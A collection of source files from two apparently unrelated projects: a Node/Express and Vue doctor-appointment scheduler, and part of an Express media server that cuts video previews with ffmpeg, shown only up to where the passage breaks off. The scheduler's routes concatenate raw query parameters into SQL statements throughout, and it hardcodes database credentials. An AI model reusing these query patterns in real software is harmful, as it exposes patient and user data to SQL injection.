user: 'postgres', //env var: PGUSER
database: 'seq', //env var: PGDATABASE
host: 'localhost', // Server hosting the postgres database
port: 5432, //env var: PGPORT
max: 10, // max number of clients in the pool
idleTimeoutMillis: 30000, // how long a client is allowed to remain idle before being closed
}//new
var curr_letters = "";
//here we use pg module to interface between
//Node and our PostgreSQL database
var client = new pg.Client(pes);
var doc = new pg.Client(doctor);
var users = new pg.Client(doctorUsers);
doc.connect();
users.connect();
client.connect();
//used to deal with CORS
// A user makes a cross-origin HTTP request
//when it requests a resource from a different domain, protocol, or port
//than the one from which the current document originated.
app.use(function(req, res, next) {
res.header("Access-Control-Allow-Origin", "*");
res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept");
next();
});
app.post('/what', function(req,res){
res.send(req.query.username);
});
//there is a table for requests and for operations
//deletes a specific request
app.post('/removeRequest', function(req,res){
console.log("reached remove request")
var pkid = req.query.pkid;
doc.query("DELETE FROM request WHERE pkid="+pkid+"");
res.send("request removed");
});
//clearR clears requests for a user
app.post('/clearR', function(req,res){
var id = req.query.user;
doc.query("DELETE FROM request WHERE userid="+id+" AND update ='cancelled'");
doc.query("UPDATE request SET update = 'd' WHERE (userid = '"+id+"') AND (update IS NOT NULL)");
res.send("hi");
});
app.delete('/remove', function(req,res){
//delete specified record based of pkid
console.log(req.query.pkid);
client.query("DELETE FROM esloc WHERE pkid="+req.query.pkid+"");
res.send(req.query.pkid);
});
//this will take care of removing an
//event from the calendar when a user clicks
//on it to remove it
app.get('/removeAppointments', function(req,res){
//delete specified record based of pkid
pkid = req.query.id;
admin = req.query.admin;
var getName = doc.query("SELECT pfirst,requestid FROM operations WHERE pkid = '"+pkid+"'")
getName.on("row", function (row, result) {
result.addRow(row);
});
getName.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
if(json[0].pfirst == null){
doc.query("DELETE FROM operations WHERE pkid="+req.query.id+"");
}
else{
if(admin == 'admin'){
doc.query("DELETE FROM operations WHERE pkid="+pkid+"");
console.log(pkid);
pkid = parseInt(pkid)+1;
console.log(pkid);
doc.query("DELETE FROM operations WHERE pkid="+pkid+"");
doc.query("UPDATE request SET update = 'cancelled' WHERE pkid = '"+json[0].requestid+"'");
}
else{
doc.query("DELETE FROM operations WHERE pkid="+pkid+"");
pkid = parseInt(pkid)-1;
doc.query("DELETE FROM operations WHERE pkid="+pkid+"");
doc.query("UPDATE request SET update = 'cancelled' WHERE pkid = '"+json[0].requestid+"'");
}
}
res.send(json);
})
});
//this is called when Doctor accepts a request
// that conflicts with a prior event
app.post('/updateRequest', function(req,res){
var update = req.query.update;
var pkid = req.query.pkid;
doc.query("UPDATE request SET update = '"+update+"' WHERE pkid = '"+pkid+"'")
res.send("hi");
})
//
app.get('/getOperation', function(req,res){
var pkid = req.query.pkid;
var mystr = "SELECT * FROM operations WHERE (pkid='"+pkid+"') "
var query = doc.query(mystr )
query.on("row", function (row, result) {
result.addRow(row);
});
query.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
res.send(json);
})
})
app.post('/whichDoc', function(req,res){
var user = req.query.user;
var docId = req.query.docId;
users.query("UPDATE users SET docid = '"+docId+"' WHERE id = '"+user+"'")
var getName = users.query("SELECT first, last,admin,id FROM users WHERE id = '"+docId+"'")
getName.on("row", function (row, result) {
result.addRow(row);
});
getName.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
res.send(json);
})
});
//this fetches the events to be displayed on the calendar
app.get('/getAppointments', function(req,res){
var id = req.query.id;
var JSON1;
var docId = users.query("SELECT docId,admin FROM users WHERE id = '"+id+"'")
var doctorSelected;
docId.on("row", function (row, result) {
result.addRow(row);
});
docId.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
doctorSelected = json[0].docid;
admin = json[0].admin;
var mystr = "SELECT * FROM operations WHERE (userid='"+doctorSelected+"') "
var query = doc.query(mystr )
query.on("row", function (row, result) {
result.addRow(row);
});
query.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
var events = [];
console.log(json);
var color = "";
var theTitle;
for(var i=0; i<json.length; i++){
if(admin == "admin"){
if(json[i].plast != null && json[i].plast != "null"){
theTitle = json[i].activity;
}
else{
theTitle = json[i].activity;
}
}
else{
if(json[i].dfirst !=null && doctorSelected == id){
theTitle = json[i].activity+" with Dr. "+json[i].dlast;
}
else if(doctorSelected != id && doctorSelected!=null && json[i].plast !=null && json[i].plast != "null"){
theTitle = json[i].activity;
}
else{
theTitle = json[i].activity;
}
}
var myevent = {
title: theTitle,
start: json[i].yearmonthday+"T"+json[i].start,
end: json[i].yearmonthday+"T"+json[i].end1,
id: json[i].pkid,
color: "#"+json[i].color,
}
events.push(myevent);
}
res.send(events);
})
})
})
app.post('/requestAccepted', function(req,res){
var stime = req.query.stime;
var docid = req.query.docid;
var etime = req.query.etime;
var id = req.query.userid;
var activity = req.query.activity;
var yearmonthday = req.query.yearmonthday;
var auto_insert = req.query.auto_insert;
var first = req.query.first;
var last = req.query.last;
var dfirst = req.query.dfirst;
var dlast = req.query.dlast;
var auto_insert = req.query.auto_insert;
var reqId = req.query.reqId;
var sAMPM;
var eAMPM
if(stime.includes("AM")){
sAMPM = "AM";
}
else{
sAMPM = "PM";
}
if(stime.includes("AM")){
eAMPM = "AM";
}
else{
eAMPM = "PM";
}
var stime = getTime(stime, sAMPM);
var etime = getTime(etime, eAMPM);
mystr = "SELECT * FROM operations WHERE (userid='"+docid+"') AND ( ('"+stime+"'<= start AND '"+etime+"' >= end1) OR (start<='"+stime+"' AND end1>= '"+etime+"') OR (start <= '"+stime+"' AND end1 >= '"+stime+"') OR (start<= '"+etime+"' AND end1>= '"+etime+"')) AND (yearmonthday = '"+yearmonthday+"')" //this was used to select all elements belonging to a specific user
if(auto_insert == "NO"){
var query = doc.query(mystr )
query.on("row", function (row, result) {
result.addRow(row);
});
query.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
if(json[0] == null){
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,pfirst,plast,dfirst,dlast,requestid) VALUES ('"+stime+"','"+etime+"','"+docid+"','"+activity+"','"+yearmonthday+"','"+first+"','"+last+"','"+dfirst+"','"+dlast+"','"+reqId+"')");
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,pfirst,plast,dfirst,dlast,requestid) VALUES ('"+stime+"','"+etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+first+"','"+last+"','"+dfirst+"','"+dlast+"','"+reqId+"')");
res.send("inserted");
} else {
var i =0;
var x =0;
for(key in json){
if (json[key].start == etime || json[key].end1 == stime){
x++;
}
i++;
}
console.log("x = "+x);
console.log("i = "+i);
if(x==i){
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,pfirst,plast,dfirst,dlast,requestid) VALUES ('"+stime+"','"+etime+"','"+docid+"','"+activity+"','"+yearmonthday+"','"+first+"','"+last+"','"+dfirst+"','"+dlast+"','"+reqId+"')");
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,pfirst,plast,dfirst,dlast,requestid) VALUES ('"+stime+"','"+etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+first+"','"+last+"','"+dfirst+"','"+dlast+"','"+reqId+"')");
res.send("inserted");
}
else{
res.send(JSON1);
}
}
})
}
else{
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,pfirst,plast,dfirst,dlast,requestid) VALUES ('"+stime+"','"+etime+"','"+docid+"','"+activity+"','"+yearmonthday+"','"+first+"','"+last+"','"+dfirst+"','"+dlast+"','"+reqId+"')");
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,pfirst,plast,dfirst,dlast,requestid) VALUES ('"+stime+"','"+etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+first+"','"+last+"','"+dfirst+"','"+dlast+"','"+reqId+"')");
res.send("inserted");
}
})
app.post('/request', function(req,res){
var color = req.query.color1;
var Stime = req.query.Stime;
var docid = req.query.docid;
var Shour;
var Smin;
var Ehour;
var Emin;
var Etime = req.query.Etime;
var sAMPM = req.query.sAMPM;
var eAMPM = req.query.eAMPM;
var id = req.query.id;
var activity = req.query.activity;
var yearmonthday = req.query.yearmonthday;
var auto_insert = req.query.auto_insert;
var why = "2017-25-30?";
var Stime = getTime(Stime, sAMPM);
var Etime = getTime(Etime, eAMPM);
var userinfo = users.query("SELECT first, last FROM users WHERE id = '"+id+"'")
userinfo.on("row", function (row, result) {
result.addRow(row);
});
userinfo.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
first = json[0].first;
last = json[0].last;
var docName = users.query("SELECT first, last FROM users WHERE id = '"+docid+"'")
docName.on("row", function (row, result) {
result.addRow(row);
});
docName.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
doc.query("INSERT INTO request (stime,etime,userid,activity,yearmonthday,docid,first,last,dfirst,dlast) VALUES ('"+Stime+"','"+Etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+docid+"','"+first+"','"+last+"','"+json[0].first+"','"+json[0].last+"')");
})
})
res.send("inserted");
});
app.get('/getRequests', function(req,res){
var docId = req.query.docid;
var show = req.query.show;
console.log(show);
var docId = doc.query("SELECT * FROM request WHERE (docid = '"+docId+"')");
docId.on("row", function (row, result) {
result.addRow(row);
});
docId.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
console.log("hi");
console.log(json);
var arr = [];
if(show=="show"){
console.log("MADE IT")
for(var i = 0; i < json.length; i++) {
if(json[i].update == null){
arr.push(json[i])
}
}
res.send(arr);
}
else{
res.send(json);
}
})
});
app.get('/showUpdates', function(req,res){
var user = req.query.user;
var docId = doc.query("SELECT * FROM request WHERE (userid = '"+user+"')");
docId.on("row", function (row, result) {
result.addRow(row);
});
docId.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
var arr = [];
for(var i = 0; i < json.length; i++) {
if(json[i].update != null && json[i].update != 'd'){
arr.push(json[i])
}
}
res.send(arr);
})
})
function getTime(time,AMPM){
var time = time.split(":");
hour = parseInt(time[0])
if(hour<10){
hour=0+hour.toString()
}
min = parseInt(time[1])
if(min<10){
min = 0+min.toString()
}
hour= parseInt(hour);
if(AMPM == "PM"){
if(hour!=12){
hour = hour + 12;
}
}
if(AMPM == "AM"){
if(hour<10){
hour = "0"+hour;
}
}
hour.toString();
time = hour+":"+min+":"+"00";
return time;
}
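//usage sketch for getTime (values follow from the logic above):
// getTime("9:30", "AM") -> "09:30:00"
// getTime("9:30", "PM") -> "21:30:00"
// getTime("12:05", "PM") -> "12:05:00" (and "12:05" with "AM" also stays "12:05:00")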
app.post('/operation', function(req,res){
var color = req.query.color1;
var Stime = req.query.Stime;
var Shour;
var Smin;
var Ehour;
var Emin;
var Etime = req.query.Etime;
var sAMPM = req.query.sAMPM;
var eAMPM = req.query.eAMPM;
var id = req.query.id;
var activity = req.query.activity;
var requestAccepted = req.query.requestAccepted;
var yearmonthday = req.query.yearmonthday;
var auto_insert = req.query.auto_insert;
var why = "2017-25-30?";
var MStime = Stime;
var MEtime = Etime;
var Stime = getTime(Stime, sAMPM);
var Etime = getTime(Etime, eAMPM);
var JSON1;
var mystr;
mystr = "SELECT * FROM operations WHERE (userid='"+id+"') AND ( ('"+Stime+"'<= start AND '"+Etime+"' >= end1) OR (start<='"+Stime+"' AND end1>= '"+Etime+"') OR (start <= '"+Stime+"' AND end1 >= '"+Stime+"') OR (start<= '"+Etime+"' AND end1>= '"+Etime+"')) AND (yearmonthday = '"+yearmonthday+"')" //this was used to select all elements belonging to a specific user
if(auto_insert == "NO"){
var query = doc.query(mystr )
query.on("row", function (row, result) {
result.addRow(row);
});
query.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
if(json[0] == null){
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,color) VALUES ('"+Stime+"','"+Etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+color+"')");
res.send("inserted");
} else {
var i =0;
var x =0;
while(i<json.length){
if (json[i].start == Etime || json[i].end1 == Stime){
x++;
}
i++;
}
if(x==i){
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,color) VALUES ('"+Stime+"','"+Etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+color+"')");
res.send("inserted");
}
else{
res.send(JSON1);
}
}
})
}
else{
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,color) VALUES ('"+Stime+"','"+Etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+color+"')");
res.send("inserted");
}
});
app.listen(3000, function () {
console.log('CORS-enabled web server listening on port 3000')
})
<|start_filename|>clean_server/createUserTable/app/sequelize.js<|end_filename|>
/*var Sequelize = require('sequelize'),
sequelize = new Sequelize('postgres://user:password@localhost:5432/database')
module.exports = sequelize*/
var Sequelize = require('sequelize'),
sequelize = new Sequelize('postgres://daniel:admin@localhost:5432/seq')
//here you will need to configure sequelize to work for your own setup
module.exports = sequelize
<|start_filename|>scurrent_clean/app/dist/theme.css<|end_filename|>
#signupbtn{
background-color: #1D2731;
border-color: #1D2731;
color: white;
}
#gotologin{
font-weight: bold;
background-color: #1D2731;
border-color: #1D2731;
color: white;
margin-top: 5px;
margin-left: 5px;
opacity: .8;
}
#gotologin:hover{
opacity: 1;
}
.conflictD{
opacity: 1;
}
dialog{
opacity:.7;
background-color:#e7fff9;
}
#mrowDocRequest{
margin-top: 20px;
}
#mrowDocRequest:hover{
background-color: #6790B1;
color:black;
}
#favDialog1{
opacity:.7;
background-color:#e7fff9;
/*border:10px solid orange;
opacity: .7;
color: red;
padding: 1.5em;
margin: 1em auto;
border: 0;
border-top: 5px solid #69c773;*/
}
#favDialog1 h3{
margin-left:70px;
}
#mrowDoc:hover{
background-color: #6790B1;
color:white;
}
#divcontainer2 .form-control:focus{
/* border-color: #1D2731;
outline: 0;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(29, 39, 49, 1);
box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(29, 39, 49, 1);*/
border-color: #337ab7;
outline: 0;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(51, 122, 183, 1);
box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(51, 122, 183, 1);
}
#calendarContainer .form-control:focus{
border-color: #337ab7;
outline: 0;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(51, 122, 183, 1);
box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(51, 122, 183, 1);
}
#calendarContainer select:focus{
border-color: #337ab7;
outline: 0;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(51, 122, 183, 1);
box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(51, 122, 183, 1);
}
#calendarContainer .form-control{
margin-bottom: 5px;
}
#calSubBtn {
margin-top: 25px;
}
#caReqBtn{
margin-top: 25px;
}
#updatesDialog button{
margin-top: 10px;
}
#updatesDialog h3{
text-align: center;
}
.docbtns{
background-color: #E8E8E8;
}
.docbtns:hover{
background-color: #B6B6B6;
color:white;
}
.reqViewBtn{
margin-top: 25px;
margin-left: 200px;
}
.textC{
font-weight: bold;
color: #337ab7;
margin-bottom: 20px;
margin-top: 5px;
margin-left: 40px;
}
#colorSelect{
margin-top: 5px;
}
#cancellationsBtn{
margin-top: 25px;
}
#divcontainer2{
margin-left: auto;
width: 30%;
margin-right: auto;
height: 100%;
margin-top: 5%
}
#container2{
width: 100%;
}
/* Popup container - can be anything you want */
.popup {
position: relative;
display: inline-block;
cursor: pointer;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
}
/* The actual popup */
.popup .popuptext {
visibility: hidden;
width: 160px;
background-color: #555;
color: #fff;
text-align: center;
border-radius: 6px;
padding: 8px 0;
position: absolute;
z-index: 1;
bottom: 125%;
left: 50%;
margin-left: -80px;
}
/* Popup arrow */
.popup .popuptext::after {
content: "";
position: absolute;
top: 100%;
left: 50%;
margin-left: -5px;
border-width: 5px;
border-style: solid;
border-color: #555 transparent transparent transparent;
}
/* Toggle this class - hide and show the popup */
.popup .show {
visibility: visible;
-webkit-animation: fadeIn 1s;
animation: fadeIn 1s;
}
/* Add animation (fade in the popup) */
@-webkit-keyframes fadeIn {
from {opacity: 0;}
to {opacity: 1;}
}
@keyframes fadeIn {
from {opacity: 0;}
to {opacity:1 ;}
}
#divcontainer{
margin-left: auto;
width: 20%;
margin-right: auto;
height: 100%;
margin-top: 10%
}
#container{
width: 100%;
}
.btn-primary {
color: #C09F80;
background-color: #76323F;
border-color: #76323F;
margin-top: 20px;
opacity: .8;
}
.btn-primary:hover{
color: #C09F80;
background-color: #76323F;
border-color: #76323F;
margin-top: 20px;
opacity: 1;
}
#loginbtn:hover {
opacity: 1;
}
#signbtn{
opacity: .8;
font-weight: bold;
margin-top: 5px;
margin-left: 5px;
background-color: #1D2731;
border-color: #1D2731;
color: white;
}
#signbtn:hover{
opacity: 1;
}
#loginbtn{
background-color: #1D2731;
border-color: #1D2731;
color: white ;
opacity: .8;
}
<|start_filename|>clean_server/resources/app/controllers/signupController.js<|end_filename|>
var bcrypt = require('bcrypt'),
Model = require('../models/models.js')
module.exports.show = function(req, res) {
res.render('signup')
}
module.exports.signup = function(req, res) {
express = require('express');
var cors = require('cors');
var router = express.Router()
router.use(cors());
var username = req.query.username
var password = req.query.password
var password2 = req.query.password2
//create the hashed password
var salt = bcrypt.genSaltSync(10)
var hashedPassword = bcrypt.hashSync(password, salt)
var newUser = {
username: username,
salt: salt,
password: hashedPassword
}
Model.User.create(newUser).then(function() { //.create inserts a new record from the given input via sequelize
res.send('success');
console.log('did it')
}).catch(function(error) {
req.flash('error', "Please, choose a different username.")
res.redirect('/signup')
})
}
<|start_filename|>scurrent_clean/app/src/renderer/main.js<|end_filename|>
import Vue from 'vue'
import Electron from 'vue-electron'
import Resource from 'vue-resource'
import Router from 'vue-router'
import Vuex from 'vuex'
import jQuery from 'jquery'
global.jQuery = jQuery
import App from './App'
import routes from './routes'
import { store } from './store.js';
Vue.use(require('vue-full-calendar'));
Vue.use(Electron)
Vue.use(Resource)
Vue.use(Router)
Vue.use(Vuex);
Vue.config.debug = true
const router = new Router({
scrollBehavior: () => ({ y: 0 }),
routes
})
//creates new Vue using my App.vue file
new Vue({
store,
router,
...App,
beforeMount: function(){
//.fullCalendar
$('#calendar').fullCalendar({
events: [
{
title : 'event1',
start : '2017-06-01'
},
{
title : 'event2',
start : '2017-06-05',
end : '2010-01-07'
},
{
title : 'event3',
start : '2017-06-09T12:30:00',
allDay : false // will make the time show
}
],
navLinks: true,
header:
{
left: 'prev,next today',
center: 'title',
right: 'month,agendaWeek,agendaDay'
},
});
}
}).$mount('#app')
<|start_filename|>clean_server/createUserTable/app/model/operationModels.js<|end_filename|>
var Sequelize = require('sequelize')
var attributes = {
userid: {
type: Sequelize.INTEGER,
},
start: {
type: Sequelize.TIME,
},
end1: {
type: Sequelize.TIME,
},
activity: {
type: Sequelize.STRING,
},
yearmonthday: {
type: Sequelize.STRING,
},
color: {
type: Sequelize.STRING,
},
pfirst: {
type: Sequelize.STRING,
},
plast: {
type: Sequelize.STRING,
},
dfirst: {
type: Sequelize.STRING,
},
dlast: {
type: Sequelize.STRING,
},
requestid: {
type: Sequelize.INTEGER,
},
}
var options = {
freezeTableName: true
}
module.exports.attributes = attributes
module.exports.options = options
<|start_filename|>clean_server/resources/app/models/models.js<|end_filename|>
var UserMeta = require('./User.js'),
connection = require('../sequelize.js')
//here we define our connection to user table using sequelize
//and make use of attributes defined in User.js
var User = connection.define('users', UserMeta.attributes, UserMeta.options)
// you can define relationships here
module.exports.User = User
<|start_filename|>clean_server/resources/app/routers/appRouter.js<|end_filename|>
var passport = require('passport'),
signupController = require('../controllers/signupController.js'),
bcrypt = require('bcrypt'),
Model = require('../models/models.js'),
pg = require("pg"),//new
LocalStrategy = require('passport-local').Strategy;
var doctor = {//new
user: 'postgres', //env var: PGUSER
database: 'seq', //env var: PGDATABASE
host: 'localhost', // Server hosting the postgres database
port: 5432, //env var: PGPORT
max: 10, // max number of clients in the pool
idleTimeoutMillis: 30000, // how long a client is allowed to remain idle before being closed
}//new
var doc = new pg.Client(doctor);//new
doc.connect();//new
module.exports = function(express) {
var router = express.Router()
var cors = require('cors')
router.use(cors());
router.use(function(req, res, next) {
res.header("Access-Control-Allow-Origin", "*");
res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept");
next();
});
router.post('/what', function(req,res){
res.send(req.query.username);
});
var isAuthenticated = function (req, res, next) {
if (req.isAuthenticated())
return next()
req.flash('error', 'You have to be logged in to access the page.')
res.redirect('/')
}
router.get('/getDocs', function(req,res){
console.log(req.query.admin)
var mystr = "SELECT username,first,last,city,specialty,id FROM users WHERE admin = 'admin'";
var query = doc.query(mystr);
query.on("row", function (row, result) {
result.addRow(row);
});
query.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
console.log(json1)
res.send(json1);
})
})
router.get('/signup', signupController.show)
router.post('/signup', function(req, res){
console.log(req.query);
var city = req.query.city
var first = req.query.first
var last = req.query.last
var specialty = req.query.specialty
var username = req.query.username
var password = req.query.password
var password2 = req.query.password2
var admin = req.query.admin
// console.log(username);
if (!username || !password || !password2) { //checks to make sure all fields filled in
//make sure all fields filled in
res.send('error1');
}
else if (password !== password2) {
//passwords do not match
res.send('error2');
}
else {
var salt = bcrypt.genSaltSync(10)
var hashedPassword = bcrypt.hashSync(password, salt)
var newUser = {
username: username,
salt: salt,
password: hashedPassword,
admin: admin,
first: first,
last: last,
city: city,
specialty: specialty,
}
Model.User.create(newUser).then(function() { //.create inserts a new record from the given input via sequelize
var mystr = "SELECT MAX(id) FROM users";
var query = doc.query(mystr);
query.on("row", function (row, result) {
result.addRow(row);
});
query.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
console.log("The json is: "+ json1)
res.send(json1);
})
}).catch(function(error) {
// req.flash('error', "Please, choose a different username.")
res.send('error3');
})
}
})
router.post('/login', function(req, res, next) {
//local specifies that we use the local strategy
//show local strategy
passport.authenticate('local', function(err, user, info) {
req.logIn(user, function(err) {
if (err) { res.send('error')}
else{//return res.redirect('/users/' + user.username);
res.send(user);} //perhaps make an sql query here and return the pkid of user
});
})(req, res, next);
});
router.get('/', function(req, res) {
res.render('home')
})
router.get('/dashboard', isAuthenticated, function(req, res) {
res.render('dashboard')
})
router.get('/logout', function(req, res) {
req.logout()
res.redirect('/')
})
router.get('/hi',function(req,res){
console.log('HI');
})
return router
}
<|start_filename|>clean_server/createUserTable/app/model/User.js<|end_filename|>
var Sequelize = require('sequelize')
var attributes = {
username: {
type: Sequelize.STRING,
allowNull: false,
unique: true,
validate: {
is: /^[a-z0-9\_\-]+$/i,
}
},
email: {
type: Sequelize.STRING,
validate: {
isEmail: true
}
},
first: {
type: Sequelize.STRING,
},
last: {
type: Sequelize.STRING,
},
password: {
type: Sequelize.STRING,
},
salt: {
type: Sequelize.STRING
},
admin: {
type: Sequelize.STRING
},
specialty: {
type: Sequelize.STRING
},
city: {
type: Sequelize.STRING
},
docid: {
type: Sequelize.INTEGER
},
}
var options = {
freezeTableName: true
}
module.exports.attributes = attributes
module.exports.options = options
<|start_filename|>scurrent_clean/app/src/renderer/store.js<|end_filename|>
import Vuex from 'vuex'
export const store = new Vuex.Store({
state: {
safelyStoredNumber: 3,
user: "",
admin: "",
docId: "",
},
getters: {
safelyStoredNumber: state => state.safelyStoredNumber,
user: state => state.user,
admin: state => state.admin,
docId: state => state.docId,
},
mutations: {
setStoredNumber(state, newNumber) {
// newNumber is the payload passed in.
state.safelyStoredNumber = newNumber;
},
user(state, newUser){
state.user = newUser;
},
docId(state, newdocId){
state.docId = newdocId;
},
admin(state, newAdmin){
state.admin = newAdmin;
}
}
});
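// Usage sketch from a component (hypothetical; the mutation and getter names are
// the ones defined above):
// this.$store.commit('user', 42)
// this.$store.getters.user // -> 42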
| danieltoorani/adminScheduler |
<|start_filename|>server.js<|end_filename|>
import "dotenv/config.js";
import express from "express";
import rateLimit from "express-rate-limit";
import list from "./src/list.js";
import video from "./src/video.js";
import image from "./src/image.js";
import file from "./src/file.js";
import checkSecret from "./src/check-secret.js";
const {
SERVER_ADDR = "0.0.0.0",
SERVER_PORT = 3000,
VIDEO_PATH = "/mnt/",
TRACE_MEDIA_SALT,
TRACE_API_SECRET,
} = process.env;
const app = express();
app.disable("x-powered-by");
app.set("trust proxy", 1);
app.use((req, res, next) => {
res.set("Access-Control-Allow-Origin", "*");
res.set("Access-Control-Allow-Methods", "GET, OPTIONS");
res.set("Referrer-Policy", "no-referrer");
res.set("X-Content-Type-Options", "nosniff");
res.set(
"Content-Security-Policy",
[
"default-src 'none'",
"media-src 'self'",
"base-uri 'none'",
"frame-ancestors 'none'",
"form-action 'none'",
"block-all-mixed-content",
].join("; ")
);
next();
});
app.use(
rateLimit({
max: 30, // 30 requests per IP address (per node.js process)
windowMs: 60 * 1000, // per 1 minute
})
);
app.get("/", (req, res) => res.send("ok"));
app.get("/video/:anilistID/:filename", video);
app.get("/image/:anilistID/:filename", image);
app.use("/file/:anilistID/:filename", checkSecret, file);
app.use("/list", checkSecret, list);
if (TRACE_API_SECRET) {
console.log("Video upload/download secured by TRACE_API_SECRET");
}
if (TRACE_MEDIA_SALT) {
console.log("Video clip and image secured by TRACE_MEDIA_SALT");
}
console.log(`VIDEO_PATH: ${VIDEO_PATH}`);
app.listen(SERVER_PORT, SERVER_ADDR, () =>
console.log(`Media server listening on ${SERVER_ADDR}:${SERVER_PORT}`)
);
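// Example invocation (placeholder values, not taken from any real deployment):
// SERVER_PORT=3000 VIDEO_PATH=/mnt/ TRACE_API_SECRET=changeme node server.js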
<|start_filename|>src/list.js<|end_filename|>
import path from "path";
import fs from "fs-extra";
const { VIDEO_PATH = "/mnt/" } = process.env;
export default async (req, res) => {
const videoDirPath = path.join(VIDEO_PATH, req.path);
if (!videoDirPath.startsWith(VIDEO_PATH)) {
return res.status(403).send("Forbidden");
}
if (!fs.existsSync(videoDirPath)) {
return res.status(404).send("Not found");
}
res.json(fs.readdirSync(videoDirPath));
};
<|start_filename|>src/lib/get-video-duration.js<|end_filename|>
import child_process from "child_process";
export default (filePath) => {
const stdLog = child_process.spawnSync(
"ffprobe",
["-i", filePath, "-show_entries", "format=duration", "-v", "quiet"],
{ encoding: "utf-8" }
).stdout;
const result = /duration=((\d|\.)+)/.exec(stdLog);
if (result === null) {
return null;
}
return parseFloat(result[1]);
};
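// Usage sketch (hypothetical path): returns the duration in seconds parsed from
// ffprobe's output, or null when no duration line is found.
// const seconds = getVideoDuration("/mnt/21519/example.mp4");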
<|start_filename|>src/video.js<|end_filename|>
import path from "path";
import fs from "fs-extra";
import crypto from "crypto";
import child_process from "child_process";
import detectScene from "./lib/detect-scene.js";
const { VIDEO_PATH = "/mnt/", TRACE_MEDIA_SALT } = process.env;
const generateVideoPreview = (filePath, start, end, size = "m", mute = false) => {
const ffmpeg = child_process.spawnSync(
"ffmpeg",
[
"-hide_banner",
"-loglevel",
"error",
"-nostats",
"-y",
"-ss",
start - 10,
"-i",
filePath,
"-ss",
"10",
"-t",
end - start,
mute ? "-an" : "-y",
"-map",
"0:v:0",
"-map",
"0:a:0",
"-vf",
`scale=${{ l: 640, m: 320, s: 160 }[size]}:-2`,
"-c:v",
"libx264",
"-crf",
"23",
"-profile:v",
"high",
"-preset",
"faster",
"-r",
"24000/1001",
"-pix_fmt",
"yuv420p",
"-c:a",
"aac",
"-b:a",
"128k",
"-max_muxing_queue_size",
"1024",
"-movflags",
"empty_moov",
"-map_metadata",
"-1",
"-map_chapters",
"-1",
"-f",
"mp4",
"-",
],
{ maxBuffer: 1024 * 1024 * 100 }
);
if (ffmpeg.stderr.length) {
console.log(ffmpeg.stderr.toString());
}
return ffmpeg.stdout;
};
export default async (req, res) => {
if (
TRACE_MEDIA_SALT &&
req.query.token !==
crypto
.createHash("sha1")
.update([req.params.anilistID, req.params.filename, req.query.t, TRACE_MEDIA_SALT].join(""))
.digest("base64")
.replace(/[^0-9A-Za-z]/g, "")
) {
return res.status(400).send("Bad Request");
}
const t = parseFloat(req.query.t);
if (isNaN(t) || t < 0) {
return res.status(400).send("Bad Request");
}
